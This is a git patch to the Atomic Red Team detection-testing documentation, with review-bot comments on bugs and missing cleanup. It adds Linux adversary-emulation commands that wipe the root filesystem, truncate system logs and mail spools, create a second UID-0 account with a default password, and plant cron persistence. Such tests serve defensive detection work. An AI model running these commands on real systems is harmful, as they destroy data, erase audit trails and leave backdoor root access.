From 895c6f2d4fb5cd2d3ea12c75b37f832aea261362 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 5 Feb 2019 21:05:01 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1070/T1070.md | 40 ++++++++++ atomics/T1107/T1107.md | 19 ++++- atomics/T1136/T1136.md | 22 ++++++ atomics/T1168/T1168.md | 40 +++++++--- atomics/index.md | 14 +++- atomics/index.yaml | 171 +++++++++++++++++++++++++++++++++++------ atomics/linux-index.md | 14 +++- atomics/macos-index.md | 10 ++- 8 files changed, 285 insertions(+), 45 deletions(-) diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index 7d79875b..b3b14332 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -26,6 +26,10 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https:// - [Atomic Test #3 - rm -rf](#atomic-test-3---rm--rf) +- [Atomic Test #4 - Overwrite Linux Mail Spool](#atomic-test-4---overwrite-linux-mail-spool) + +- [Atomic Test #5 - Overwrite Linux Log](#atomic-test-5---overwrite-linux-log) +
@@ -72,3 +76,39 @@ rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* ```
+
+ +## Atomic Test #4 - Overwrite Linux Mail Spool +This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + +**Supported Platforms:** Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Username of mail spool | String | root| + +#### Run it with `bash`! +``` +echo 0> /var/spool/mail/#{username} +``` +
+
+ +## Atomic Test #5 - Overwrite Linux Log +This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + +**Supported Platforms:** Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| log_path | Path of specified log | Path | /var/log/secure| + +#### Run it with `bash`! +``` +echo 0> #{log_path} +``` +
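Review bot: Both new executors in this hunk (`echo 0> /var/spool/mail/#{username}` and `echo 0> #{log_path}`) contain a redirection bug: bash reads a digit immediately before `>` as a file descriptor number, so `0>` redirects fd 0 (stdin) to the target rather than writing the character `0` to it. The file is still truncated because it is opened for writing, but nothing is written to it and `echo` prints an empty line to stdout. Write `echo 0 > #{log_path}` (with a space) if the intent is to overwrite the log with `0`, or `: > #{log_path}` if plain truncation is intended, and say which in the description so detection content is built against what actually happens on disk. The default `/var/log/secure` only exists on RHEL-family systems; on Debian/Ubuntu the equivalent is `/var/log/auth.log`, so there the test creates an empty new file instead of wiping a log, and the input description should state that the default assumes CentOS/RHEL. Neither test has a cleanup and neither warns that the overwritten log cannot be recovered; the same warning wording used for Test #12 in T1107 would fit here.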
diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md index bdcb58c2..b72842d2 100644 --- a/atomics/T1107/T1107.md +++ b/atomics/T1107/T1107.md @@ -28,6 +28,8 @@ There are tools available from the host operating system to perform cleanup, but - [Atomic Test #11 - wbadmin](#atomic-test-11---wbadmin) +- [Atomic Test #12 - Delete Filesystem - Linux](#atomic-test-12---delete-filesystem---linux) +
@@ -184,7 +186,7 @@ wmic shadowcopy delete
## Atomic Test #10 - bcdedit -xxx +This test leverages `bcdedit` to remove boot-time recovery measures. **Supported Platforms:** Windows @@ -198,7 +200,7 @@ bcdedit /set {default} recoveryenabled no
## Atomic Test #11 - wbadmin -xxx +This test deletes Windows Backup catalogs. **Supported Platforms:** Windows @@ -208,3 +210,16 @@ xxx wbadmin delete catalog -quiet ```
+
+ +## Atomic Test #12 - Delete Filesystem - Linux +This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. + +**Supported Platforms:** Linux, CentOS, Ubuntu + + +#### Run it with `bash`! +``` +rm -rf / --no-preserve-root > /dev/null 2> /dev/null +``` +
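Review bot: `rm -rf / --no-preserve-root > /dev/null 2> /dev/null` wipes the host it runs on, including the Atomic Red Team checkout and every local log a blue team would need to validate its detection, and the only guard is a sentence in the description that nothing consuming `executor.command` will read. Consider adding an explicit confirmation input, or at least stating in the description that the test must only be run in a disposable, snapshotted VM and that host logs must be forwarded off-box before the command runs, since that is the only way the detection evidence survives. Minor: `Supported Platforms: Linux, CentOS, Ubuntu` uses a different order from the other tests in this patch (`macOS, CentOS, Ubuntu, Linux`).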
diff --git a/atomics/T1136/T1136.md b/atomics/T1136/T1136.md index 55c3b8ec..a696863c 100644 --- a/atomics/T1136/T1136.md +++ b/atomics/T1136/T1136.md @@ -14,6 +14,8 @@ The net user commands can be used to create a local or domain accou - [Atomic Test #4 - Create a new user in PowerShell](#atomic-test-4---create-a-new-user-in-powershell) +- [Atomic Test #5 - Create a new user in Linux with `root` UID and GID.](#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid) +
@@ -95,3 +97,23 @@ New-LocalUser -Name #{username} -NoPassword net user /add #{username} ```
+
+ +## Atomic Test #5 - Create a new user in Linux with `root` UID and GID. +Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. + +**Supported Platforms:** Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Username of the user to create | String | butter| +| password | Password of the user to create | String | BetterWithButter| + +#### Run it with `bash`! +``` +useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username} +echo "#{password}" | passwd --stdin #{username} +``` +
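Review bot: `passwd --stdin` is a RHEL/CentOS-specific option that Debian and Ubuntu `passwd` do not accept, so the second line of the executor fails on part of the declared `Linux` platform; `echo "#{username}:#{password}" | chpasswd` is the portable form. The description ("adds the user to the `root` group") understates what `useradd -o -u 0 -g 0` does: it creates a second account with UID 0 and GID 0, a full root-equivalent login, and that is the detection-relevant fact (a second `uid=0` entry in `/etc/passwd`) the description should state. There is also no cleanup (`userdel #{username}`), so the test leaves a root-equivalent account with a published default password behind; the description should say so.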
diff --git a/atomics/T1168/T1168.md b/atomics/T1168/T1168.md index b81a35e6..0010420e 100644 --- a/atomics/T1168/T1168.md +++ b/atomics/T1168/T1168.md @@ -18,15 +18,17 @@ Each launchd job is described by a different configuration property list (plist) ## Atomic Tests -- [Atomic Test #1 - Cron Job](#atomic-test-1---cron-job) +- [Atomic Test #1 - Cron - Replace crontab with referenced file](#atomic-test-1---cron---replace-crontab-with-referenced-file) -- [Atomic Test #2 - Cron Job](#atomic-test-2---cron-job) +- [Atomic Test #2 - Cron - Add script to cron folder](#atomic-test-2---cron---add-script-to-cron-folder) + +- [Atomic Test #3 - Event Monitor Daemon Persistence](#atomic-test-3---event-monitor-daemon-persistence)
-## Atomic Test #1 - Cron Job -Set a cron job +## Atomic Test #1 - Cron - Replace crontab with referenced file +This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. **Supported Platforms:** macOS, CentOS, Ubuntu, Linux @@ -34,17 +36,37 @@ Set a cron job #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| script | Script to execute | path | /tmp/evil.sh| +| command | Command to execute | string | /tmp/evil.sh| +| tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil| -#### Run it with `sh`! +#### Run it with `bash`! ``` -echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil +echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} ```

-## Atomic Test #2 - Cron Job -Manually set a cron job +## Atomic Test #2 - Cron - Add script to cron folder +This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + +**Supported Platforms:** macOS, CentOS, Ubuntu, Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| +| cron_script_name | Name of file to store in cron folder | string | persistevil| + +#### Run it with `bash`! +``` +echo "#{command}" > /etc/cron.daily/#{cron_script_name} +``` +
+
+ +## Atomic Test #3 - Event Monitor Daemon Persistence +This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. **Supported Platforms:** macOS, CentOS, Ubuntu, Linux diff --git a/atomics/index.md b/atomics/index.md index 6b18f9d6..5452054d 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -38,6 +38,7 @@ - Atomic Test #2: Create a user account on a MacOS system [macos] - Atomic Test #3: Create a new user in a command prompt [windows] - Atomic Test #4: Create a new user in PowerShell [windows] + - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -72,8 +73,9 @@ - [T1152 Launchctl](./T1152/T1152.md) - Atomic Test #1: Launchctl [macos] - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - T1162 Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037 Logon Scripts](./T1037/T1037.md) - Atomic Test #1: Logon Scripts [windows] @@ -198,6 +200,7 @@ - Atomic Test #9: Delete VSS - wmic [windows] - Atomic Test #10: bcdedit [windows] - Atomic Test #11: wbadmin [windows] + - Atomic Test #12: Delete Filesystem - Linux [linux, centos, ubuntu] - [T1222 File Permissions Modification](./T1222/T1222.md) - Atomic Test #1: Take ownership using takeown utility [windows] - Atomic Test #2: Take ownership recursively using takeown utility [windows] 
@@ -246,6 +249,8 @@ - Atomic Test #1: Clear Logs [windows] - Atomic Test #2: FSUtil [windows] - Atomic Test #3: rm -rf [macos, linux] + - Atomic Test #4: Overwrite Linux Mail Spool [linux] + - Atomic Test #5: Overwrite Linux Log [linux] - [T1202 Indirect Command Execution](./T1202/T1202.md) - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows] @@ -541,8 +546,9 @@ - [T1152 Launchctl](./T1152/T1152.md) - Atomic Test #1: Launchctl [macos] - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - [T1170 Mshta](./T1170/T1170.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - [T1086 PowerShell](./T1086/T1086.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index bcd4d04a..a871736a 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -1156,6 +1156,27 @@ persistence: command: | New-LocalUser -Name #{username} -NoPassword net user /add #{username} + - name: Create a new user in Linux with `root` UID and GID. + description: 'Creates a new user in Linux and adds the user to the `root` group. + This technique was used by adversaries during the Butter attack campaign. + +' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: String + default: butter + password: + description: Password of the user to create + type: String + default: BetterWithButter + executor: + name: bash + command: |- + useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username} + echo "#{password}" | passwd --stdin #{username} T1158: technique: id: attack-pattern--dc27c2ec-c5f9-4228-ba57-d67b590bda93 @@ -2125,8 +2146,10 @@ persistence: created: '2017-12-14T16:46:06.044Z' identifier: T1168 atomic_tests: - - name: Cron Job - description: 'Set a cron job + - name: Cron - Replace crontab with referenced file + description: 'This test replaces the current user''s crontab file with the contents + of the referenced file. This technique was used by numerous IoT automated + exploitation attacks. ' supported_platforms: 
@@ -2135,17 +2158,23 @@ persistence: - ubuntu - linux input_arguments: - script: - description: Script to execute - type: path + command: + description: Command to execute + type: string default: "/tmp/evil.sh" + tmp_cron: + description: Temporary reference file to hold evil cron schedule + type: path + default: "/tmp/persistevil" executor: - name: sh - command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil + name: bash + command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} ' - - name: Cron Job - description: 'Manually set a cron job + - name: Cron - Add script to cron folder + description: 'This test adds a script to a cron folder configured to execute + on a schedule. This technique was used by the threat actor Rocke during the + exploitation of Linux web servers. ' supported_platforms: @@ -2153,6 +2182,28 @@ persistence: - centos - ubuntu - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + name: bash + command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + +' + - name: Event Monitor Daemon Persistence + description: "This test adds persistence via a plist to execute via the macOS + Event Monitor Daemon. \n" + supported_platforms: + - macos + - centos + - ubuntu + - linux executor: name: manual steps: | @@ -5354,7 +5405,7 @@ defense-evasion: ' - name: bcdedit - description: 'xxx + description: 'This test leverages `bcdedit` to remove boot-time recovery measures. ' supported_platforms: 
@@ -5365,15 +5416,28 @@ defense-evasion: bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no - name: wbadmin - description: 'xxx - -' + description: "This test deletes Windows Backup catalogs. \n" supported_platforms: - windows executor: name: command_prompt command: 'wbadmin delete catalog -quiet +' + - name: Delete Filesystem - Linux + description: 'This test deletes the entire root filesystem of a Linux system. + This technique was used by Amnesia IoT malware to avoid analysis. This test + is dangerous and destructive, do NOT use on production equipment. + +' + supported_platforms: + - linux + - centos + - ubuntu + executor: + name: bash + command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null + ' T1222: technique: @@ -6535,6 +6599,39 @@ defense-evasion: command: | rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* + - name: Overwrite Linux Mail Spool + description: 'This test overwrites the Linux mail spool of a specified user. + This technique was used by threat actor Rocke during the exploitation of Linux + web servers. + +' + supported_platforms: + - linux + input_arguments: + username: + description: Username of mail spool + type: String + default: root + executor: + name: bash + command: 'echo 0> /var/spool/mail/#{username} + +' + - name: Overwrite Linux Log + description: 'This test overwrites the specified log. This technique was used + by threat actor Rocke during the exploitation of Linux web servers. + +' + supported_platforms: + - linux + input_arguments: + log_path: + description: Path of specified log + type: Path + default: "/var/log/secure" + executor: + name: bash + command: 'echo 0> #{log_path}' T1202: technique: id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e 
@@ -14998,8 +15095,10 @@ execution: created: '2017-12-14T16:46:06.044Z' identifier: T1168 atomic_tests: - - name: Cron Job - description: 'Set a cron job + - name: Cron - Replace crontab with referenced file + description: 'This test replaces the current user''s crontab file with the contents + of the referenced file. This technique was used by numerous IoT automated + exploitation attacks. ' supported_platforms: @@ -15008,17 +15107,23 @@ execution: - ubuntu - linux input_arguments: - script: - description: Script to execute - type: path + command: + description: Command to execute + type: string default: "/tmp/evil.sh" + tmp_cron: + description: Temporary reference file to hold evil cron schedule + type: path + default: "/tmp/persistevil" executor: - name: sh - command: 'echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil + name: bash + command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} ' - - name: Cron Job - description: 'Manually set a cron job + - name: Cron - Add script to cron folder + description: 'This test adds a script to a cron folder configured to execute + on a schedule. This technique was used by the threat actor Rocke during the + exploitation of Linux web servers. ' supported_platforms: @@ -15026,6 +15131,28 @@ execution: - centos - ubuntu - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + name: bash + command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + +' + - name: Event Monitor Daemon Persistence + description: "This test adds persistence via a plist to execute via the macOS + Event Monitor Daemon. \n" + supported_platforms: + - macos + - centos + - ubuntu + - linux executor: name: manual steps: | 
diff --git a/atomics/linux-index.md b/atomics/linux-index.md index a144b8f1..fb3823f5 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -10,6 +10,7 @@ - Atomic Test #3: Firefox [linux, windows, macos] - [T1136 Create Account](./T1136/T1136.md) - Atomic Test #1: Create a user account on a Linux system [linux] + - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] - [T1158 Hidden Files and Directories](./T1158/T1158.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #3: Hidden file [macos, linux] @@ -17,8 +18,9 @@ - Atomic Test #10: Create hidden directories and files [macos, linux] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1166 Setuid and Setgid](./T1166/T1166.md) @@ -153,6 +155,7 @@ - Atomic Test #1: Delete a single file - Linux/macOS [linux, macos] - Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos] - Atomic Test #3: Overwrite and delete a file with shred [linux] + - Atomic Test #12: Delete Filesystem - Linux [linux, centos, ubuntu] - [T1222 File Permissions Modification](./T1222/T1222.md) - Atomic Test #8: chmod - Change file or folder mode (numeric mode) [macos, linux] - Atomic Test #9: chmod - Change file or folder mode (symbolic mode) [macos, linux] 
@@ -174,6 +177,8 @@ - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070 Indicator Removal on Host](./T1070/T1070.md) - Atomic Test #3: rm -rf [macos, linux] + - Atomic Test #4: Overwrite Linux Mail Spool [linux] + - Atomic Test #5: Overwrite Linux Log [linux] - [T1130 Install Root Certificate](./T1130/T1130.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] - [T1036 Masquerading](./T1036/T1036.md) @@ -203,8 +208,9 @@ - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - [T1064 Scripting](./T1064/T1064.md) - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux] - [T1153 Source](./T1153/T1153.md) diff --git a/atomics/macos-index.md b/atomics/macos-index.md index e99dd6a4..de022769 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md 
@@ -28,8 +28,9 @@ - [T1152 Launchctl](./T1152/T1152.md) - Atomic Test #1: Launchctl [macos] - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - T1162 Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037 Logon Scripts](./T1037/T1037.md) - Atomic Test #2: Logon Scripts - Mac [macos] @@ -105,8 +106,9 @@ - [T1152 Launchctl](./T1152/T1152.md) - Atomic Test #1: Launchctl [macos] - [T1168 Local Job Scheduling](./T1168/T1168.md) - - Atomic Test #1: Cron Job [macos, centos, ubuntu, linux] - - Atomic Test #2: Cron Job [macos, centos, ubuntu, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux] + - Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux] + - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux] - [T1064 Scripting](./T1064/T1064.md) - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux] - [T1153 Source](./T1153/T1153.md)
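Review bot: In the T1168 hunk, Test #2 writes `/etc/cron.daily/#{cron_script_name}` with neither a shebang nor the execute bit; `run-parts` only runs executable files, so as written the script is dropped into the folder but never executed, and a `chmod +x` after the `echo` is needed for the test to exercise the technique. `/etc/cron.daily` also does not exist on macOS (which schedules maintenance through `periodic`), and Test #3 targets emond, which is macOS-only, yet both tests list `macOS, CentOS, Ubuntu, Linux`; Test #2 should drop macOS and Test #3 should list only macOS. Test #1 replaces the user's entire crontab and leaves `#{tmp_cron}` on disk with no cleanup; the description should say the existing crontab is lost.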
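Review bot: Across the index.yaml hunks the new entries are inconsistent in `type:` casing (`String`/`Path` in the T1136 and T1070 entries, `string`/`path` in the T1168 entries); pick one form so validation and generated docs stay uniform. The new T1136 test name (`Create a new user in Linux with `root` UID and GID.`) is the only `name:` value ending in a period, which then propagates into every index heading and anchor; drop the trailing period. The "Overwrite Linux Log" executor (`command: 'echo 0> #{log_path}'`) omits the trailing newline that every other `command:` block in the file carries, and the same `0>` redirection bug noted on the T1070.md hunk is present in both copies of that test here.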